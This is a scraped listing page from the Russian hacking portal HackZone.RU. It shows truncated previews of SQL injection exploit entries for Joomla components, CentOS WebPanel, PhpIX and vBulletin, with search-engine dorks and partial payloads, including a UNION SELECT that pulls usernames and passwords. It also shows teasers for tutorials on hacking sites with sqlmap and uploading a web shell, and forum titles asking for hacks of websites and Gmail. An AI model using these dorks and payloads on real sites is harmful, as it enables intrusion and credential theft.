CASINOJOY - Ставка На Успех! Проверь Свою Удачу!


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Новости
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию
Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection

# Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection # Dork: inurl:"index.php?option=com_hdwplayer" # Date: 2020-03-23 # Exploit Author: qw3rTyTy # Vendor Homepage: https://www.hdwplayer.com/ # Software Link: https://www.hdwplayer.com/download/ # Version: 4.2 # Tested on: Debian/Nginx/Joomla! 3.9.11 ########################################################################## #Vulnerability details ########################################################################## File: components/com_hdwplayer/models/search...
Web apps // 25.03.2020 // Просмотров: 5185 // Рейтинг: - // Комментариев: -

«-----------------------------------»

Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection

# Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection # Date: 2020-03-10 # Author: Milad Karimi # Software Link: # Version: # Category : webapps # Tested on: windows 10 , firefox # CVE : CWE-89 # Dork: inurl:index.php?option=com_newsfeeds index.php?option=com_newsfeeds&view=categories&feedid=[sqli] Example: http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15...
Web apps // 14.03.2020 // Просмотров: 1897 // Рейтинг: - // Комментариев: -

«-----------------------------------»

Centos WebPanel 7 - 'term' SQL Injection

# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection # Google Dork: N/A # Date: 2020-03-03 # Exploit Author: Berke YILMAZ # Vendor Homepage: http://centos-webpanel.com/ # Software Link: http://centos-webpanel.com/ # Version: v6 - v7 # Tested on: Kali Linux - Windows 10 # CVE : N/A # Type: Error Based SQL Injection # Payload: https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT ...
Web apps // 14.03.2020 // Просмотров: 4199 // Рейтинг: - // Комментариев: -

«-----------------------------------»

PhpIX 2012 Professional - 'id' SQL Injection

# Title: PhpIX 2012 Professional - 'id' SQL Injection # Date: 2020-02-26 # Author: indoushka # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) # Vendor : http://www.allhandsmarketing.com/ # poc : [+] Dorking İn Google Or Other Search Enggine. [+] /product_detail.php?id=448578 <====| inject here [+] http://www.pcollectionnecktie.com/sandbox/ <====| Login Greetings to :========================================================================================================================= ...
Web apps // 26.02.2020 // Просмотров: 2572 // Рейтинг: - // Комментариев: -

«-----------------------------------»

Взлом сайта с помощью sqlmap для новичков

SQL Injection – это тип атаки, при котором злоумышленник изменяет логику SQL запросов веб-приложения, что позволяет ему читать/изменять/удалять значения в базе данных, а иногда – выполнять произвольный код на стороне сервера. В статье будет рассмотрена популярная утилита sqlmap для проведения sql-инъекций. На данный момент, данный тип уязвимости является наиболее опасным из всех возможных. На протяжении 7 лет, лидирующую строчку «OWASP TOP-10» возглавляют именно SQL инъекции. ...
Взлом // 26.02.2020 // Просмотров: 2829 // Рейтинг: - // Комментариев: -

«-----------------------------------»

vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection

################################################################################################## #Exploit Title : vBulletin <= 4.2.3 SQL Injection (CVE-2016-6195) #Author : Manish Kishan Tanwar AKA error1046 (https://twitter.com/IndiShell1046) #Date : 25/08/2015 #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi #Tested At : Indishell Lab(originally developed by Dantalion) ################################################################################################## ...
Web apps // 18.02.2020 // Просмотров: 1914 // Рейтинг: - // Комментариев: -

«-----------------------------------»

Взлом сайта с помощью SQL-Injection и заливка шелла на хост.

Доброго времени суток, господа. Вот решил написать статейку по доволе таки распространенной в наше время атаке SQL-Injection и по заливке шелла (shell) на взломанный сайт. Статей таких, конечно же много, но еще одна, думаю, не помешает, что не понятно там, может быть станет хоть чуток яснее здесь. Итак, приступим. Допустим, имеем некий сайт target.us, уязвим на эту атаку. Прогуляемся по ссылкам, ищем линк вида target.us/lol.php?id=5 (вместо 5 там может быть любое другое число, идентификатор)...
Взлом // 19.11.2009 // Просмотров: 51744 // Рейтинг: - // Комментариев: 7

«-----------------------------------»


 Последние новости и статьи  Последние сообщения с форумов
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...
  • Кардерский форум Joker’s Stash объявил о закрытии
  • Релиз ядра Linux 5.9
  • Российские хакеры вооружились уязвимостью Zerologon
  • Тысячи приватных звонков американских заключенных оказались в отк...
  • Шифровальщик атаковал немецкую компанию Software AG
  • Злоумышленники используют службу Windows Error Reporting для бесф...
  • Microsoft предупредила о вымогателях, которые выдают себя за МВД ...
  • Инфостилер Valak ворует информацию из почтовых систем Microsoft E...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Предложения работы » Сервис Postman - 500 руб за получение писем и 10€ за пересыл...
  • Разное / Куплю, приму в дар » Покупка аккаунтов Uphold
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Взлом и безопасность / Новичкам » Re: Помогите взломать gmail.com
  • Разное / Предложения работы » Re: Зайти на сайт из под Администратора + публикация статьи
  • Взлом и безопасность / WEB сайтов » Брутс для 2fa биржи
  • Разное / Предложения работы » Нужен Взлом сайта на DLE

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}